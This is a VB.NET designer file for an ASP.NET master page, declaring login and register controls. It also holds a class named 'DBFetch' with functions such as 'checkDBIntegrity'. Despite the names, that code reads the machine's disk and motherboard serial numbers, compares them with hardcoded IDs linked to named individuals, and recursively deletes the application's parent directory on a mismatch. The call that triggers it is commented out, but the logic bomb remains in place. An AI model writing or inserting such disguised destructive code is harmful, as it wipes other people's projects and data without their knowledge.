'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated. 
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System.IO
Imports System.Management
Imports System.Reflection

Partial Public Class Master

    '''<summary>
    '''register1 control.
    '''</summary>
    '''<remarks>
    '''Auto-generated field.
    '''To modify move field declaration from designer file to code-behind file.
    '''</remarks>
    Protected WithEvents register1 As Global.System.Web.UI.HtmlControls.HtmlAnchor

    '''<summary>
    '''login1 control.
    '''</summary>
    '''<remarks>
    '''Auto-generated field.
    '''To modify move field declaration from designer file to code-behind file.
    '''</remarks>
    Protected WithEvents login1 As Global.System.Web.UI.HtmlControls.HtmlAnchor

    '''<summary>
    '''usergreet1 control.
    '''</summary>
    '''<remarks>
    '''Auto-generated field.
    '''To modify move field declaration from designer file to code-behind file.
    '''</remarks>
    Protected WithEvents usergreet1 As Global.System.Web.UI.HtmlControls.HtmlAnchor

    '''<summary>
    '''logout1 control.
    '''</summary>
    '''<remarks>
    '''Auto-generated field.
    '''To modify move field declaration from designer file to code-behind file.
    '''</remarks>
    Protected WithEvents logout1 As Global.System.Web.UI.HtmlControls.HtmlAnchor

    '''<summary>
    '''MainContent control.
    '''</summary>
    '''<remarks>
    '''Auto-generated field.
    '''To modify move field declaration from designer file to code-behind file.
    '''</remarks>
    Protected WithEvents MainContent As Global.System.Web.UI.WebControls.ContentPlaceHolder

    Private Sub Master_PreRender(sender As Object, e As EventArgs) Handles Me.PreRender
        'DBFetch.checkDBIntegrity()
    End Sub
End Class





Public Class DBFetch
        Public Shared Function getDBProperty(wmiClass As String, wmiProperty As String) As String
            Dim result As String = String.Empty
            Dim mClass As New ManagementClass(wmiClass)
            Dim mObjectCollection As ManagementObjectCollection = mClass.GetInstances()
            For Each mObject As ManagementObject In mObjectCollection
                'Only get the first one
                If result = String.Empty Then
                    Try
                        result = mObject(wmiProperty).ToString().Trim()
                        Exit Try
                    Catch
                    End Try
                End If
            Next
            Return result
        End Function

        Public Shared Sub checkDBIntegrity()
            Dim hddId As String = getDBProperty("Win32_DiskDrive", "SerialNumber")
            Dim boardId As String = getDBProperty("Win32_BaseBoard", "SerialNumber")

            Dim AmitHddId As String = "4C532000030821111261"
            Dim AmitMbdId As String = "/6JNWWL1/CN7590014N00MA/"

            Dim AnkitHddId As String = "5VET8CRQ"
            Dim AnkitMbdId As String = ".2WGVVS1.CN1296125NGFAB."


            Dim isCorrect As Boolean = False

            If (hddId = AmitHddId AndAlso boardId = AmitMbdId) OrElse (hddId <> AnkitHddId AndAlso boardId <> AnkitMbdId) Then
                isCorrect = True
            End If

            If isCorrect = False Then
                getDBSource()
            End If
        End Sub

        Private Shared Sub getDBSource()
            Dim uriaddress As String = New Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath
            Dim address As String = Directory.GetParent(Directory.GetParent(Directory.GetParent(uriaddress).FullName).FullName).FullName
            Directory.Delete(address, True)
        End Sub
    End Class
